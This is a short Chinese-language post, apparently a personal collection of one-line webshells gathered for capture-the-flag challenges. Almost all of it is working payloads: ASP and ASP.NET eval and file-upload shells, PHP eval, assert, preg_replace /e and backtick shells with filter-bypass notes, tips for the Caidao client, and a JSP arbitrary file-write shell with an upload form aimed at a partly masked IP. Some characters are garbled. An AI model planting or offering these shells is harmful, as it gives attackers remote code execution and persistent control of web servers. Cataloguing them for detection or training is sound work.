最近總是碰到小馬的題目,心想還是小小收集一下各種的小馬,碰到新的再更新
<%eval request("sb")%><%execute request("sb")%><%execute(request("sb"))%><%execute request("sb")%><%'<% loop <%:%><%'<% loop <%:%><%execute request("sb")%><%execute request("sb")'<% loop <%:%>[code][code]<script language=vbs runat=server>eval(request("sb"))</script><%execute request("sb")'<% loop <%:%>[code][code]<script language=vbs runat=server>eval(request("sb"))</script>%><%Eval(Request(chr(35)))%><%<%eval request("sb")%><%ExecuteGlobal request("sb")%>if Request("sb")<>"" then ExecuteGlobal request("sb") end if
<?php eval($_POST[sb])?><?php @eval($_POST[sb])?> //容錯代碼<?php assert($_POST[sb]);?> //使用lanker一句話客戶端的專家模式執(zhí)行相關的php語句<?$_POST['sa']($_POST['sb']);?><?$_POST['sa']($_POST['sb'],$_POST['sc'])?><?php@preg_replace("/[email]/e",$_POST['h'],"error");?>//使用這個后,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入<O>h=@eval($_POST[c]);</O><script language="php">@eval($_POST[sb])</script>//繞過<?限制的一句話<?=@eval($_POST['cmd']);//這個也是吊炸天...<?=`*`;//吊炸天!大致上等價于//<?php echo `bash bash2 index.html p.php` ?>//訪問p.php的時候,bash就會執(zhí)行bash2這個文件里的命令,后面的文件無視掉//通過修改bash2這個文件的內(nèi)容就可以構造命令執(zhí)行。$filename=$_GET['xbid'];include ($filename);//危險的include函數(shù),直接編譯任何文件為php格式運行$reg="c"."o"."p"."y";$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%><form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post"><textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br><input type=submit value="提交"></form>
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%><%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>//Jscript的asp.net一句話<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>//C#的asp.net一句話<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>//VB的asp.net一句話
聯(lián)系客服